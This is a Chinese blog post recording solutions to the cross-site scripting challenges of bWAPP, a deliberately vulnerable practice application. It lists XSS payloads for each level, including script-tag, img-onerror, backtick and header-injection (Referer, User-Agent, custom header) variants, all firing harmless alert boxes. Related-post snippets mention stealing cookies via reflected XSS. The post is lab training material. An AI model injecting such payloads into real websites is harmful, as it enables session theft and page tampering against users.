bWAPP A3 XSS注入解题记录

最新推荐文章于 2023-09-09 23:25:51 发布
最新推荐文章于 2023-09-09 23:25:51 发布
阅读量765 收藏 4
点赞数
分类专栏: 信息安全练习 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43623492/article/details/105217380
版权

bWAPP A3 XSS解题记录

GET

将payload输入到First name中 ,Last name中随便输入点什么
payload:<script>alert('ok')</script>
在这里插入图片描述

POST

low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
在这里插入图片描述

JSON

low payload:"}]}';alert('ok');</script>
medium模式不会,符号被转换成了HTML实体
在这里插入图片描述

AJAX/JSON

low and medium payload:
<img src=1 onerror=alert('ok')>
在这里插入图片描述

AJAX/XML

low payload:&#60;img src=1 onerror=alert('ok')&#62;
medium payload:&#60;img src=1 onerror=alert`ok`&#62;
在这里插入图片描述

Back Button

开发者模式查看按钮
在这里插入图片描述发现可以将input标签进行闭合来实现注入,用burpsuite进行抓包,修改referer
在这里插入图片描述
low payload:'"><script>alert('ok')</script>
medium payload:'"><script>alert`ok`</script>

在这里插入图片描述

Custom Header

百度翻译了一下页面的提示,意思是 “一些web客户端使用自定义的HTTP请求头。。。我们的bWAPP头的内容:”
所以我们抓包自己写一个请求头
在这里插入图片描述low payload:bWAPP: <script>alert('ok')</script>
medium对单引号进行了过滤,所以换成以下payload
medium payload:bWAPP: <script>alert`ok`</script>
在这里插入图片描述

Eval

low 修改URL中的Data()为alert('ok')
在这里插入图片描述
medium 修改URL中的Data()如下图
在这里插入图片描述

HREF

随便输入个123后,查看源码,发现我们输入的132在p标签内,所以尝试闭合p标签
low payload:</p><script>alert('ok')</script>
在这里插入图片描述
medium 符号被转换成了HTML实体,所以不会

Login Form

这题貌似没有XSS 注入点(我没找到)但是可以用SQL注入,所以就不写了

phpMyAdmin BBCode Tag XSS

没思路。。。。。

PHP_SELF

First name输入payload Last name随便输入点什么
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
在这里插入图片描述

Referer

看页面上的提示,发现referer的内容会显示在页面上,所以我们抓包修改referer 修改结果如图所示
在这里插入图片描述low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>

在这里插入图片描述

User-Agent(反射型)

看页面上的提示,发现User-Agent的内容会显示在页面上,所以我们抓包修改User-Agent 修改结果如图所示
在这里插入图片描述
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
在这里插入图片描述

Blog

随便输入个一二三,查看网页源码发现我们输入的内容在td标签内,所以我们尝试闭合td标签
low payload:<script>alert('ok')<script>
medium payload:<script>alert`ok`</script>
在这里插入图片描述

Change Secret

开发者模式下发现有一个type为hidden的input
在这里插入图片描述
将hidden修改为text,在新出现的文本框中输入payload
low payload:"><script>alert`ok`</script><"
在这里插入图片描述
medium不会

Cookies SQLiteManager XSS

貌似不止用到了XSS注入,好像还有点别的东西,其实我不会

Stored (User-Agent)

抓包修改User-Agent
在这里插入图片描述low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
在这里插入图片描述

zhangdy_plus
关注
专栏目录
bWAPP通关记录(A3~xss)
qq_39670065的博客
08-16 1431
@[TOC](A3- Cross-Site Scripting (XSS)) Cross- Site Scripting - Reflected (GET) Cross-Site Scripting - Reflected (POST) Cross-Site Scripting - Reflected (JSON) Cross-Site Scripting - Reflected (AJAX/JSON) Cross-Site Scripting - Reflected (AJAX/XML) Cross-Si
bWAPP解法记录——XSS
bringer的博客
12-19 3125
bWAPP解法记录——XSS bWAPP简介 ​ bwapp是一个漏洞演示平台,包含100多个漏洞。可以单独下载安装,也可以下载虚拟机版本。此处给出下载地址: https://sourceforge.net/projects/bwapp/ xss漏洞练习 跨站脚本攻击的终极思路:让输入的内容在页面中回显。 1-XSS - Reflected(GET) 1)low等级 未对输入进行过滤 在...
bWAPP / A3 - Cross-Site Scripting (XSS) /
打代码的小女孩
01-26 549
8.跨站脚本攻击(XSS)——反射型GET 影响范围:主站 URL:http://192.168.211.131/bWAPP/xss_get.php 描述:XSS 的危害在于允许攻击者注入代码到 web 站点中,加载网页时就会在受害者浏览器上得到执行。用户输入参数从客户端上传至服务器,由于缺乏对用户输入参数的检查,导致可以植入 javascript 代码,并在服务器下次返回网页结果至客户端的时候触...
bWAPP XSS
angry_program的博客
03-08 910
0x01、XSS - Reflected (GET) Low 输入的内容直接输出到页面中: 后台服务端没有对输入的参数进行过滤, 直接任选一个注入xss payload即可: <script>alert(1)</script> Medium 虽然服务端进行了过滤, 但只是addslashes()函数而已(防sql注入), 依旧可以xss: ...
bwapp XSS
h0ld1rs的博客
08-14 780
文章目录XSS - Reflected (GET)XSS - Reflected (POST)XSS - Reflected (JSON)XSS - Reflected (AJAX/JSON)XSS - Reflected (Back Button)XSS - Reflected (Custom Header)XSS - Reflected (Eval)XSS - Reflected (HREF)XSS - Reflected (Login Form)XSS - Reflected (PHP_SELF)XS
bWAPP-XSS
hee_mee的博客
01-06 313
zeronil
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
**XSS注入详解** XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息、操控用户行为或进行钓鱼攻击。`xss-labs-master....
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
django框架防止XSS注入的方法分析
09-19
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,它允许攻击者通过在网页上注入恶意脚本,从而在受害者浏览器中执行代码。这种攻击可能导致敏感数据泄露、用户会话劫持等一系列严重后果。Django框架作为...
6.bWAPP XSS
天行健,君子以自强不息
01-26 753
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
bWAPP解题笔记——XSS
FunkyPants的博客
09-06 3918
XSS 在chrome上,需要先关闭xss保护 反射型 low 对输入未做过滤 $data = no_check($data); 输入&lt;script&gt;alert(document.cookie)&lt;/script&gt; middle 输入校验 function xss_check_4($data) { // addsla...
Bwapp之XSS –stored
hl1293348082的专栏
03-29 229
XSS 全称:跨站脚本( Cross Site Scripting ),为了不和层叠样式表( Cascading Style Sheets )的缩写 CSS 混合,所以改名为 XSS;攻击者会向 web 页面( input 表单、 URL 、留言版等位置)插入恶意 JavaScript 代码,导致 管理员/用户 访问时触发,从而达到攻击者的目的。 XSS 的危害:窃取管理员/用户的 cookie 非法登录,导致网站被挂马、服务器沦陷被控制等等…… XSS 类型:反射型、存储型、 DOM 型 0x01
【bWAPP】XSS通关记录
qq_43665434的博客
03-16 1091
【bWAPP】XSS总结 XSS-Reflected(GET与POST)解法很常规,low和mediu级别只过滤单引号,high级别用htmlspecialchars()和htmlentities(),总结以下二者区别吧。 htmlspecialchars()与htmlentities()的区别 htmlspecialchars()将以下字符转换为HTML实体 &成为&amp; "成为&quot; '不变 (设置了ENT_QUOTES后编码为&#039;或&amp
A3 跨站脚本攻击 XSS
发哥微课堂
04-19 541
0x00:审计介绍 对于跨站问题也就是我们常说的存储、反射和 DOM 三种,在挖掘 XSS 上我们一般的思路是查找可能在页面上进行输出的变量,并检查这些变量是否可控,然后跟踪传递过程,查看后端处理是否对接收的内容进行过滤或编码,在前端显示时是否被 htmlencode 之类的函数做过处理。 对于很多系统,不建议过滤特殊字符,一个体验不佳再一个有些系统是有需求可以输入特殊符号的,这时后台可以进行...
bwapp靶场XSS通关教程
2301_77315080的博客
09-08 292
lowalert("152");alert("152");进行实体引用<img src=0 onerror="alert(1)">
bWAPP中利用反射型xss获取cookie
****的博客
09-10 539
实验环境介绍 靶机:bWAPP bug类型:XSS - Reflected (GET) 难度级别:low 过程: 注:部分浏览器默认开启了XSS防御,关闭后才能实验成功。 测试靶机(图中的web server)是否存在XSS攻击。 URL地址:“http://192.168.248.174/dvwa/bWAPP/xss_get.php” 输入js代码 <script>alert(1...
bwapp通关攻略
最新发布
m0_65150886的博客
09-09 691
alert('价格')
各行业常见漏洞
Litbai_zhang
06-28 1158
互联网行业 互联网行业 通用业务模块 业务逻辑漏洞 登陆 暴力破解用户名密码 撞库 验证码爆破和绕过 手机号撞库 账户权限绕过 注册 恶意用户批量注册 恶意验证注册账户 存储型XSS 密码找回 重置任意用户账户密码 批量重置用户密码 新密码劫持 短信验证码劫持 用户邮箱劫持篡改 后台管理 管理员用户名密码绕过 目录遍历 会员系统 用户越权访问 个人资料信息泄漏 个人资料
bWAPP / A2 - Broken Auth. & Session Mgmt. /
打代码的小女孩
01-26 1219
6.无效认证——不安全的登录表单 影响范围:主站 URL:http://192.168.211.131/bWAPP/ba_insecure_login_1.php 描述:用户名和密码出现在HTML的源文件中,企图通过设置字体为白色来隐藏,但是这样无效。 威胁程度:低危(极低水平的开发人员才会出现这种情况) POC: 1、访问网址:http://192.168.211.131/bWAPP/ba_in...
XSS注入全解析:原理、危害与验证方法
XSS注入知识点总结.pdf XSS注入是网络安全领域的重要议题,位于OWASP Top 10漏洞列表中的首位。它全称为跨站脚本攻击(Cross-Site Scripting),因与CSS(层叠样式表)名称冲突而得名。XSS主要利用JavaScript(JS)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值